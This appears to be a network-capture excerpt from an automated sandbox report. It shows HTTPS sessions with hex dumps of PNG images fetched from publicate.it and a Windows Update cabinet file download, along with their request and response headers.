                                                                                                                                                                                                        2024-08-30 16:16:27 UTC619INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 4c 69 71 b5 bd c4 fe fe ff ff ff ff 8d 8d 8d ff ff ff 4e 4e 4e 02 02 02 02 02 02 0d 30 53 eb ed ee fb fb fb ff ff ff 1e 3f 60 ff ff ff ff ff ff 1d 3e 5f 1c 3d 5e 1d 3e 5f f0 f2 f2 f1 f4 f4 44 80 c1 fd fe fe fa fb fb 21 41 62 18 3a 5c ec ed ed f3 f5 f4 ef f0 ef d8 de e3 f6 f7 f9 20 40 61 ce d6 dd 14 37 59 23 39 06 0e 1b 06 fc fc fc 3e 5a 76 b9 c4 ce 09 13 04 eb ef f1 22 2c 10 1a 22 0d 1b 2e 05 a0 b0 be eb ec e9 11 23 06 e9 ea e5 36 4b 08 e5 e9 ec 99 a9 b7 37 52 70 f5 f6 f6 a8 b7 c4 6a 86 66 09 2c 52 2e 4c 6c 33 38 22 2e 36 12 c3 cd d5 92 a3 b2 82 94 a6 05 08 03 2e 40 07 d3 b3 97 b0 be ca 26 46 06 3b 58 06 47 61 06 39 41 16 c6 7d 6b 24
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTELiqNNN0S?`>_=^>_D!Ab:\ @a7Y#9>Zv",".#6K7Rpjf,R.Ll38".6.@&F;XGa9A}k$
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 87 74 5d 5d 61 59 4b 67 6b 50 bf d7 ef ae 59 42 4e 59 69 f1 ce c2 68 74 79 67 67 2a 72 3b 36 7c 6f 56 d4 d2 cc 73 63 41 64 68 10 5a 6d 83 32 43 6c b1 ce e8 9c 8b 78 32 75 bb d7 e7 f6 79 75 1d bd c0 bd cd cb c0 85 8b 17 dc dc d8 82 99 79 8b 84 6b 90 73 75 08 22 45 5d 33 29 76 99 b3 f6 e8 e3 54 66 5e 8c 5d 3f 3e 55 5a 7d 84 4a be a9 a3 9a a2 84 1f 32 4e 8c a8 c0 a9 7f 81 e4 d9 d1 79 a8 cd eb a8 91 ac 97 90 2a 46 45 ea bb ac 33 67 98 07 84 d6 ac b1 93 51 22 23 57 92 c0 89 2e 4d 66 9f cb 95 95 36 08 4e 7a 96 8d 61 06 63 bc 02 3d 9e c3 c3 a7 4a 7c ab 06 2b 70 b5 a5 5c 15 60 68 7a 00 00 00 0d 74 52 4e 53 00 18 d3 d4 08 bf 0a 02 05 fc 45 77 9d e6 6c b3 19 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd 0b 50 9b
                                                                                                                                                                                                        Data Ascii: t]]aYKgkPYBNYihtygg*r;6|oVscAdhZm2Clx2uyuyksu"E]3)vTf^]?>UZ}J2Ny*FE3gQ"#W.Mf6Nzac=J|+p\`hztRNSEwlpHYs IDATxP
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: ed 83 6a ec d3 9d 34 b8 77 7f ee 7b ff 14 12 e4 4b d8 d1 d0 bf f2 7a c0 75 4e 0c 53 11 f0 e3 48 d2 00 3c 9a db 10 fb fb 7c 85 c2 57 fe db 31 d0 7d 83 42 fe 09 05 f0 1b a4 be 1a c6 11 6d 64 ff ef ae d2 3d cc 0f d8 48 2b 94 c1 c3 13 5f 5d f5 f0 2b 51 e0 6a 79 16 c7 fc 74 31 76 b5 44 b3 03 a0 fb 93 6d c4 4d 42 39 0f f3 17 9f fb 7e 18 6d fb 0f e9 1b a1 af c3 b1 ae 8e be b9 6f 7f 19 f7 ed 1e ea 1b 3c fc 46 71 6f 76 e1 78 df 6c 7f e8 3e 41 64 5a 18 2a d0 ac a7 8e 6a b3 f0 e0 0b 71 db 3c 45 7f 1a fa da 58 fb f5 f2 47 cc c3 54 04 6f c2 c8 c3 bf 9a 1a b4 6e 5c ff c6 9e 64 07 40 87 64 3d ee 85 95 f5 4e 5e d0 3d 42 ff de be c8 d7 b6 bf 77 5f 5f 86 5d 9b 05 dd 2c 4f 5f 37 20 03 73 bf b0 35 df 8e 1b 79 c6 33 ae 13 36 22 5f 0b d2 bd ee ad 5e 1b 3e 3b 06 ba ff 6b 91 fb
                                                                                                                                                                                                        Data Ascii: j4w{KzuNSH<|W1}Bmd=H+_]+Qjyt1vDmMB9~mo<Fqovxl>AdZ*jq<EXGTon\d@d=N^=Bw__],O_7 s5y36"_^>;k
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 17 fa 76 4a d9 bc 83 b8 b5 fa c9 8a e4 57 ba 61 d1 be 54 eb 8c 84 1b 61 a5 ef dd ab d5 75 c3 04 ee fa 54 61 b5 3a 43 d8 fe f6 9d 4b d9 36 b4 27 af 2e 6d f1 4e ad 3d 2b 5c 4e 86 20 4b da 60 f8 c8 1e b0 59 13 c5 ea 05 b4 36 a6 6f c8 08 77 a1 ff e3 a0 af 0d da eb 7a 5a 56 77 ed 5e 45 84 5f 04 c8 bd 7f cd 67 09 fa ad 16 67 3c 61 9c 97 a8 d7 a0 af c5 88 bb d0 b7 74 4c f7 9e 25 f1 9a 43 f7 12 26 81 54 1d fd f5 1f 62 18 fd 4c 34 51 7c 27 dc bb d7 10 bc 5a 82 5d ad bb af de f1 b7 ad d4 e0 a2 bd cc db cb 87 84 a8 60 d9 93 27 4e 7f ba fc e3 d5 4e bf 3a c2 ef ba f7 2d 86 be c9 65 e0 5d 5a 23 91 9f 36 d2 7a 5b 57 88 5b 9b 45 5d bd a6 d6 e1 df 0d e4 b6 ed 2c 9b 57 2d de cb 7c bf e2 2a d9 70 7f 93 82 ef ba 18 62 d7 bd 6f 31 74 af 35 2d ab 0d ac ab 55 95 d5 6e aa f5 86
                                                                                                                                                                                                        Data Ascii: vJWaTauTa:CK6'.mN=+\N K`Y6owzZVw^E_gg<atL%C&TbL4Q|'Z]`'NN:-e]Z#6z[W[E],W-|*pbo1t5-Un
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 4b 3c 47 c1 99 3c df e2 3b 14 10 56 4f 1d b4 7a 26 7f 74 7a f4 66 41 d5 d5 3e a4 ea a8 a8 58 74 2e c2 76 b6 1d 0e 3d 88 4c 4b ea ef ef 8f 8b 96 fa 93 62 23 fb fb 03 02 02 e2 66 48 41 24 5a 52 00 2b 16 6e a3 fb 55 fe ab d0 75 71 e8 88 78 5f 5a f4 cb 44 e2 01 d5 4c dc c9 80 7e 78 e8 64 74 14 c9 97 16 1d 10 19 eb eb 1b 15 72 32 00 7f 34 4e aa 42 c7 07 eb a0 01 de 37 36 32 20 b5 da d7 a7 9a 15 a7 24 eb 82 e1 89 fe f8 f8 fe c8 58 72 2c ab 3f 3e 88 ac 8c 4b ad 56 05 ec 23 06 86 44 91 82 76 a1 ff 7d a1 9f 24 be 7c 80 48 3c 20 25 47 85 10 5f 3d 19 70 32 6e 86 44 20 e9 f6 12 0f 48 01 7a 30 91 b3 06 5d 15 48 3c 10 70 f2 64 7c 6c 12 31 2c 2e ee 00 47 1a 77 32 20 8c 08 8f 45 47 91 48 b6 40 62 98 94 84 a0 1f 20 12 c3 02 4e c6 49 23 89 fb 0f 04 9c c4 a1 93 a2 e2 88 7b
                                                                                                                                                                                                        Data Ascii: K<G<;VOz&tzfA>Xt.v=LKb#fHA$ZR+nUuqx_ZDL~xdtr24NB762 $Xr,?>KV#Dv}$|H< %G_=p2nD Hz0]H<pd|l1,.Gw2 EGH@b NI#{
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: be 40 e0 cd 83 a2 68 51 2b 8f c5 22 a5 c7 7a 0e a8 a6 e9 6c 36 69 2c 19 15 57 69 b4 6a f4 fa d5 d7 f8 fb f8 54 c3 83 04 1f c2 ca 0b d0 c6 c1 fe 51 50 76 81 43 ab 7d 57 9e f0 c7 df 1f ce ec ef 4b 88 92 da 6c 3a 9a 2f 7c 84 1f 61 3b db ce 86 0e d4 c9 10 68 f9 92 f7 90 e1 9f c7 f0 fd 63 bc 1e c3 0b 26 f8 47 78 ec 21 e3 b7 24 98 99 23 90 e0 68 38 cb da 6b d0 5d 92 f7 0b d0 bc 2c ec 24 8c bf a1 2f 61 e5 09 5f cf fb a3 b3 f8 ac 1e bc 1b bd ff 5d 99 fb 10 82 fc 61 12 cc df 3f 88 10 e4 8f 2c 08 b6 f5 46 5b 7a 7b 3d 86 17 c9 56 ee 04 21 c3 8f f2 f7 07 a2 41 fe 6b af 41 a7 f3 9c 7b f5 d5 e8 1e 7a 10 3d b7 f6 04 7a ff 20 f4 e0 ca 69 b7 f9 90 be f3 95 be 79 bb 0b fa c3 6f dc 2d 60 43 2b cc da 51 84 95 44 7e 7d 77 8c d7 0b 56 8f 5c cd f9 9f 6e 9b 59 69 b0 d8 f6 cc 77
                                                                                                                                                                                                        Data Ascii: @hQ+"zl6i,WijTQPvC}WKl:/|a;hc&Gx!$#h8k],$/a_]a?,F[z{=V!AkA{z=z iyo-`C+QD~}wV\nYiw
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 8f 36 73 3e 87 9f 2d a4 33 18 74 a1 50 88 61 18 9f 5f 25 a4 d3 f9 d9 d9 55 25 e6 66 cb 92 87 f9 c2 42 eb ad 69 11 97 db 24 ca fa e0 83 2c 89 4b ab 55 77 8a 19 74 4a e2 a1 37 de 38 94 78 30 22 e2 60 5e 5e 5e 86 50 4c 65 30 18 4c b8 16 f2 04 18 57 20 10 88 44 22 91 40 20 10 48 dc 8d 25 25 25 56 fb 30 14 dd b7 18 7a 20 10 1f fd d9 db 6f 47 cd c4 47 86 04 87 44 73 8e 19 8e e6 75 15 67 1f cf e8 32 74 65 d0 f9 42 36 83 d1 d3 83 75 e5 1d 3c 78 90 3b 37 07 7f ae dc ee dc dc de 5e 67 a6 76 a4 6c 98 13 6f 9b b9 51 a2 91 00 75 f4 bb 19 6a 1b c7 47 6d 36 dd 11 84 fb dc 39 0f f4 79 83 00 13 75 77 4f e4 6a de fe 44 62 90 08 44 22 2e 57 24 9f e8 76 37 8e 34 1f 8b 31 b7 70 22 1f 47 b2 80 79 e4 e3 54 d5 8d 9e ec d0 84 04 aa 66 a4 91 9d 97 97 77 f4 e8 d1 a3 87 a9 54 71 b6
                                                                                                                                                                                                        Data Ascii: 6s>-3tPa_%U%fBi$,KUwtJ78x0"`^^^PLe0LW D"@ H%%%V0z oGGDsug2teB6u<x;7^gvloQujGm69yuwOjDbD".W$v741p"GyTfwTq
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 32 ac ab f1 58 79 6d 57 57 46 06 d6 95 91 91 21 31 c0 20 9a 21 93 20 e8 32 8d ab 49 88 55 f5 d4 4a 1a 0e f5 e6 4e 66 4e dd 2b 1b 06 e2 17 17 16 86 47 2f 5d 82 f8 57 a7 b3 d9 46 cd 66 f3 e8 a8 54 49 a3 9d bf 41 43 4a 87 21 1d 34 8e ec d2 cc e0 0d 83 48 20 e0 72 05 02 3a 9b 0d 11 72 28 35 5c 08 b9 98 80 2d 29 d1 48 e4 f2 5c f7 e8 83 d1 9c 9c 9c 3f fc e1 0f e7 07 67 4d a6 e4 34 39 f3 68 5e cc 7f 1d 13 09 8e dd 6b 38 78 90 c2 a4 d2 85 19 30 f4 30 e8 1a 75 9f 7d 60 56 ad d6 e2 31 1a 20 e7 f1 3a d2 fb fa d4 2e 8d 7d b2 af 6f 72 72 64 35 80 07 ee 1d 1d a6 c5 a5 d9 82 d9 5f fd f1 57 83 f5 62 8f d4 1b 1a 7a 73 8f d9 a4 68 f8 b9 a4 54 36 4a d0 80 5e 3b 6e d6 60 2e 09 bd 2b 0f 98 ae 98 33 48 00 00 20 00 49 44 41 54 33 8e 67 37 2e 2d 2c 59 8c 1a 19 86 61 ce c9 4e 59
                                                                                                                                                                                                        Data Ascii: 2XymWWF!1 ! 2IUJNfN+G/]WFfTIACJ!4H r:r(5\-)H\?gM49h^k8x00u}`V1 :.}orrd5_WbzshT6J^;n`.+3H IDAT3g7.-,YaNY
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: b4 eb 69 a7 ae a7 a5 25 77 98 9c 5d d9 f5 55 6c 06 35 34 74 59 3b bc 58 59 59 e9 58 5c 5a ba a5 cd 9c 9c ac 53 ce 18 1d 05 c6 5f 7d f6 d9 af 66 ec 39 ef 68 f2 1a 80 79 6f ee b1 e8 78 a9 ee ac ee ec d9 23 52 a9 79 0a 2a ac 43 cd a9 66 8c de e8 a6 87 33 13 0f 65 c9 f5 02 81 fb 16 0f f2 b3 b6 b6 b6 b6 94 eb 99 99 68 54 07 2b 7c f2 bb 27 6d ed c9 bc c2 b6 77 a7 30 54 92 3b 7a f0 c2 05 a0 4f 3f 4e a5 77 49 24 86 86 c4 83 0d 9e ac cd a9 e9 c9 a9 e2 63 4e f5 d0 af b7 bc 38 f3 5f 2e b7 5b 0f b0 f3 f2 0e 1e 34 e4 42 08 77 b0 a1 37 0f 9c 9a a6 d1 32 3c dc 5a d6 d2 c2 69 2d 2b 6b 8e 79 f4 f1 9a c6 21 6f b5 58 5a e2 e3 1f a8 60 44 3c 77 ee d3 4f 2f 9d 3b a2 1b bd 6a 68 68 a0 50 b8 11 59 22 43 d4 79 a5 52 aa b3 8d 8e 0f 36 0e 8e 0f b4 70 38 c7 0c 79 5d 86 9e ae ae ae
                                                                                                                                                                                                        Data Ascii: i%w]Ul54tY;XYYX\ZS_}f9hyox#Ry*Cf3ehT+|'mw0T;zO?NwI$cN8_.[4Bw72<Zi-+ky!oXZ`D<wO/;jhhPY"CyR6p8y]
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 91 46 73 ab 45 0f 95 b9 d7 63 46 bb 32 1a ca 3f fe f8 5e f9 7c 63 a3 39 fe f7 ff f6 bf 54 ad 16 28 e5 aa b7 1e fa dd 21 a3 71 c4 68 30 e4 ea f5 72 a7 cb de 33 98 9a 34 8c 88 73 ca ee 1d 2b 2f ef ee ce 85 89 b0 dc 08 4a a2 68 ea fe ec 90 d1 65 b7 ba 8c 23 16 4b cb c8 ad 91 01 1d 68 fc 9c 54 8a 27 e3 6f d2 6e 48 d8 14 54 b4 66 30 c4 62 be 10 93 48 44 10 21 f7 42 c4 60 18 8f 4f b5 8d d7 76 61 98 40 d0 d4 24 68 c2 30 ac a9 49 26 13 70 d9 6c d0 b9 48 54 0a df 89 9c 99 7d 73 5e fe 3d ad a6 e6 fa 75 a4 7c 44 bd 22 a5 bd c3 25 ab ca e6 d7 77 2e 4f a2 74 2c 1f a0 a3 30 bd 52 9d 99 9e ae e8 f9 e4 93 e2 62 01 c6 66 4b 5c ee 47 d3 d3 d3 dd 13 13 a5 22 fd c4 c4 b1 b2 d9 a5 e0 5f 2f 3a 1c a6 c5 f6 8e f6 9f ff ef a4 2b 1e bb 79 f3 5a b4 ca 76 d6 a6 3b ab 93 ce 0c dc 2b
                                                                                                                                                                                                        Data Ascii: FsEcF2?^|c9T(!qh0r34s+/Jhe#KhT'onHTf0bHD!B`Ova@$h0I&plHT}s^=u|D"%w.Ot,0RbfK\G"_/:+yZv;+


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        130192.168.2.54991640.127.169.103443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                        MS-CorrelationId: 3bfdeeeb-399b-4e1b-b098-23f665915445
                                                                                                                                                                                                        MS-RequestId: 2e7ee952-4a99-4353-9b56-e6d72adfc6f4
                                                                                                                                                                                                        MS-CV: 8HJx6wJ7hUmBsb5s.0
                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 30005
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        131192.168.2.549921104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC743OUTGET /images/template2-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 111731
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1b473-620aa1d262291"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZGMTz1CgrnQJdWGOyyyD%2BIx%2FNPqj2EyChcKaKmVCe0NEd9Fd1i207EybZyamgnMj4NhiFMSltSGTc9a40nkCWbIw8grwkicCgpg9DdTqAyGUeAlX9zlKLQ0KvjJeuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615de39ed8c95-EWR
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC622INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 0c 0c 0c 62 61 62 1e 1e 1e 81 43 fe 01 01 01 00 00 00 01 01 01 4c 69 71 02 02 02 00 00 00 ff ff fb ff ff fd ff ff fc cd ca d1 91 5e f7 94 63 f4 fb f9 fd fd ff ff cf cc d6 ff ff fe e6 e4 ea d6 70 8c f8 f8 f6 f4 f3 f5 fb fc f9 ff ff fb ff ff fc c8 6b a3 0f 0f 0f b5 67 c1 d6 ab c4 c9 a6 c6 8b 51 fe 8b 52 fe 8b 53 fe 8b 51 fd 8a 51 fe 8b 50 fe 8b 50 fd 8b 52 fd 8a 51 fd 8a 50 fe 8c 51 fe 8a 50 fd 8b 51 ff ff d7 cd fd d7 ce 8c 52 ff 89 4e ff fe d7 ce fe d8 cd 87 4c ff 88 4e ff 8c 52 fd 8c 51 fd 88 4d ff ff dc cc 8a 4f ff 8a 52 ff 8b 52 fd 8c 54 fe 86 4f ff 86 4a ff ff da cd 8a 4c ff 8d 56 fe 8c 53 fc 87 4c fe 8e 4e fe 84 48 ff 8f 55 fb df
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbabCLiq^cpkgQRSQQPPRQPQPQRNLNRQMORRTOJLVSLNHU
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: d7 a4 6d c4 d7 a7 65 8d 6f f1 c7 95 81 8d 77 ee dd 65 77 b5 5b b4 db ac 5b a1 74 fe ab 82 fe 9a 62 ef 75 5f fe 8f 9a e0 d5 a3 c6 ae 78 b2 ad 76 e2 b1 5a ba 70 63 fe b3 7d a8 eb e4 d1 f3 de cf 8c 6b f2 be 9f fe c4 92 87 b5 7f dc dc ca ff ab 58 c4 b6 82 a2 c9 94 cf c2 8d d3 b9 85 9b e5 66 6d ca af fe bf 8b 91 b4 90 fe bc 87 d8 ae 59 bf bd 89 96 d4 bf ff dc aa c2 4e 7a fd f4 69 5a f5 f0 fa 8f ac d9 8f a3 dd c1 8d 8c e7 dc ff f4 c2 31 e5 b5 4b e6 b3 bc fd f0 ec f8 bd b1 fa 99 8b f8 aa 9e e2 e7 ff f5 e4 cd f5 86 7d fd c9 be eb eb ee d1 bb dd fd d4 85 d8 88 af 83 a3 e5 6e 00 00 00 20 74 52 4e 53 02 0c 0f fc 05 07 0b 00 03 01 c0 c0 d4 1a fc fe fe c0 31 ec 4a fc 86 6a 9a ae c7 fd 01 fd f2 e4 1b 12 a8 7d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c
                                                                                                                                                                                                        Data Ascii: meowew[[tbu_xvZpc}kXfmYNziZ1K}n tRNS1Jj}pHYs
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 5a eb 50 29 1d d7 4e c6 e7 6a c6 f7 1d ae 8e 7d df d7 2e 8a e6 7b 8f 1e f5 e6 6b 46 fb c6 c7 45 da 8f 7d 65 94 af 7c 17 c6 ec dd 28 ed 5c e4 83 e6 2e 6a ce 2f 8d 8f 2f ad cf d4 e4 b5 3e 3e 3e 57 53 46 c5 4a eb ab 77 8f 36 2b 8d 54 2b e5 5c ec 6b 1f 77 8d 7d 3f 56 4a 6b ab fd 58 19 a5 6c a3 51 bc f1 e4 e9 5e 3d d4 06 dd fb be 53 5a 55 eb 77 56 db 65 ad 2b 5b 47 9b 95 24 d6 ca 3a 6d 7d a5 d2 e2 f6 c6 56 a5 5a d9 db df bc d4 d0 5a 61 d0 46 eb e2 d6 6e fb fe fd d1 b2 0a 31 15 e8 5d 39 34 57 d5 fa ad d5 6e 49 bb d8 8f 95 d5 1c bc c6 a4 58 a7 ac c2 e4 a2 7d a8 23 23 cd 7d 2d d7 b3 1b 69 6e f0 2f ba b3 2a 64 6b c5 d1 a8 41 fb 58 69 4e b8 0d 12 fb ed af fc ea 83 57 bf f8 f2 f9 0b 7f 60 b3 ff 36 d1 69 a6 81 e6 9f fd f2 ab ff fb df 54 c2 aa 8a 31 28 a5 94 01 7d ac
                                                                                                                                                                                                        Data Ascii: ZP)Nj}.{kFE}e|(\.j//>>>WSFJw6+T+\kw}?VJkXlQ^=SZUwVe+[G$:m}VZZaFn1]94WnIX}##}-in/*dkAXiNW`6iT1(}
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 2e 77 f3 50 c3 b8 f3 b9 3c 34 74 02 87 e9 03 d5 bc 04 4f 6c 9a cd b9 a5 f1 a5 a8 e6 9a f3 e3 4b b5 9a df 74 f3 c7 7d d0 bb 0f 83 ad e6 02 65 7d 5b ad ac ed 6f 15 13 74 af 62 91 28 ea c3 3b 1d 2b b1 b8 bd fb e4 68 b3 58 a5 d6 e4 51 41 c2 14 36 ea 5b 47 9b 85 aa 0e ae de df 68 97 34 56 b8 a7 02 03 99 a5 8b 77 77 db 85 62 f7 e8 56 29 08 b8 82 c1 57 4b 77 1e 6f 1f 6d 55 c0 b7 31 0f 06 32 3c 30 5a 27 95 5b bb dd 82 36 26 f0 30 33 9c 9b 30 34 e0 1b c2 69 b8 47 f2 ed cc 85 82 37 b1 e1 36 16 3a 62 f8 9e f1 06 6b 24 64 ef f9 68 38 58 eb 0c 98 02 1b 37 b2 07 87 53 c3 a3 df fd d9 ef a7 fa f3 44 17 fe 7f ee fc e7 3e f3 b5 bf 1a bd ac 52 90 c6 7f 46 74 d1 e2 9c d6 90 e8 1a 74 36 e0 f6 4e 05 81 e7 69 ad 53 15 80 e8 21 68 6e 4c 48 92 72 2e f0 a4 2a 10 f6 8e f9 09 14 68
                                                                                                                                                                                                        Data Ascii: .wP<4tOlKt}e}[otb(;+hXQA6[Gh4VwwbV)WKwomU12<0Z'[6&0304iG76:bk$dh8X7SD>RFtt6NiS!hnLHr.*h
